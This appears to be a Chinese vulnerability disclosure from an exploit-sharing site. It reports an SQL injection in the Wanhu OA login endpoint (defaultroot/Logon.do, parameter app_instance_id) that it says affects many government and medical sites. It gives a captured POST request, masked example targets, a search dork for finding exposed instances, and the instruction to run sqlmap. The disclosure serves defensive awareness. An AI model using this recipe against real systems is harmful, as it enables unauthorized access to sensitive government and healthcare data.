### 简要描述:
万户OA某页面通用性SQL注入(影响N个政府网和医疗机构)
### 详细说明:
defaultroot/Logon.do 该页面存在越权访问,由于app_instance_id参数过滤不严,导致了SQL注入的产生
问题参数:app_instance_id
EXP:defaultroot/Logon.do
利用方法:访问该页面,输入任意内容,抓包获取,SQLMAP跑之~~~
涉及案例:
**.**.**.**:7001/defaultroot/aep/login.jsp
http://**.**.**.**/defaultroot/aep/login.jsp
http://**.**.**.**:7001/defaultroot/Logon.do
**.**.**.**:7001/defaultroot/aep/login.jsp
百度搜索到的:
https://**.**.**.**/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953
----------------------------------------POST----------------------------------
POST /defaultroot/Logon.do HTTP/1.1
Host: **.**.**.**:7001
Connection: keep-alive
Content-Length: 41
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:7001/defaultroot/aep/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: LocLan=zh_cn; JSESSIONID=Gp2TVdvDF7Yf2VdJNKC8Ql62vFJLZbfXqQ3LwhZp75XfSGQb1pCn!-1516176646; ezofficeUserName=; ezofficeDomainAccount=whir
app_instance_id=11&user_id=111&userType=0
----------------------------------------POST----------------------------------
[<img src="https://images.seebug.org/upload/201508/261144590688d6513ace327f7b9dd8356b3fac09.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/261144590688d6513ace327f7b9dd8356b3fac09.jpg)
[<img src="https://images.seebug.org/upload/201508/2611451207ae12e86948e42e82d06da24575b4c2.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/2611451207ae12e86948e42e82d06da24575b4c2.jpg)
[<img src="https://images.seebug.org/upload/201508/2611455962b7b1a66b9b31c809312885ff2ca1ae.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/2611455962b7b1a66b9b31c809312885ff2ca1ae.jpg)
### 漏洞证明:
上面有~~
暂无评论